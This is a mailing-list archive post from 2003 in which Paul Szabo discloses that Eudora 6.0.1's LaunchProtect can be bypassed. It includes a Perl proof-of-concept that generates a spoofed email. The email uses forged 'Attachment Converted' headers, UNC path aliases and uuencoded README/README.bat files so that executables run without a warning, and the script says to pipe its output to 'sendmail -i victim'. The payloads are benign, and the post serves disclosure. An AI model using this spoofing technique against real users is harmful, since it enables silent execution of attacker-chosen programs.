lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Message-ID: <200311250317.hAP3HqE375780@milan.maths.usyd.edu.au>
From: psz at maths.usyd.edu.au (Paul Szabo)
Subject: Eudora 6.0.1 LaunchProtect

Eudora 6.0.1 (on Windows) has LaunchProtect, to warn the user before
running executable attachments. However this only works in the attach
folder; using spoofed attachments, executables stored elsewhere may run
without warning. In some setups, even executables in the attach folder
may run without warning.

Harmless demo below.

Cheers,

Paul Szabo - psz@...hs.usyd.edu.au  http://www.maths.usyd.edu.au:8000/u/psz/
School of Mathematics and Statistics  University of Sydney   2006  Australia


---

#!/usr/bin/perl --

use MIME::Base64;

print "From: me\n";
print "To: you\n";
print "Subject: Eudora 6.0.1 on Windows spoof, LaunchProtect\n";
print "\n";

print "Pipe the output of this script into:   sendmail -i victim\n";

print "
Eudora 6.0.1 LaunchProtect handles the X-X.exe dichotomy in the attach
directory only, and allows spoofed attachments pointing to an executable
stored elsewhere to run without warning:\n";
print "Attachment Converted\r: <a href=c:/winnt/system32/calc>go.txt</a>\n";
print "Attachment Converted\r: c:/winnt/system32/calc\n";

$X = 'README'; $Y = "$X.bat";
print "\nThe X - X.exe dichotomy: send a plain $X attachment:\n";
$z = "rem Funny joke\r\npause\r\n";
print "begin 600 $X\n", pack('u',$z), "`\nend\n";
print "\nand (in another message or) after some blurb so is scrolled off in
another screenful, also send $Y. Clicking on $X does not
get it any more (but gets $Y, with a LauchProtect warning):\n";
$z = "rem Big joke\r\nrem Should do something nasty\r\npause\r\n";
print "begin 600 $Y\n", pack('u',$z), "`\nend\n";

print "
Can be exploited if there is more than one way into attach: in my setup
H: and \\\\rome\\home are the same thing, but Eudora does not know that.\n";
print "These elicit warnings:\n";
print "Attachment Converted\r: <a href=h:/eudora/attach/README>readme</a>\n";
print "Attachment Converted\r: h:/eudora/attach/README\n";
print "while these do the bad thing without warning:\n";
print "Attachment Converted\r: <a href=file://rome/home/eudora/attach/README>readme</a>\n";
print "Attachment Converted\r: //rome/home/eudora/attach/README\n";
print "Attachment Converted\r: \\\\rome\\home\\eudora\\attach\\README\n";

print "
For the default setup, Eudora knows that C:\\Program Files
and C:\\Progra~1 are the same thing...\n";
print "Attachment Converted\r: \"c:/program files/qualcomm/eudora/attach/README\"\n";
print "Attachment Converted\r: \"c:/progra~1/qualcomm/eudora/attach/README\"\n";

print "\n";


Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ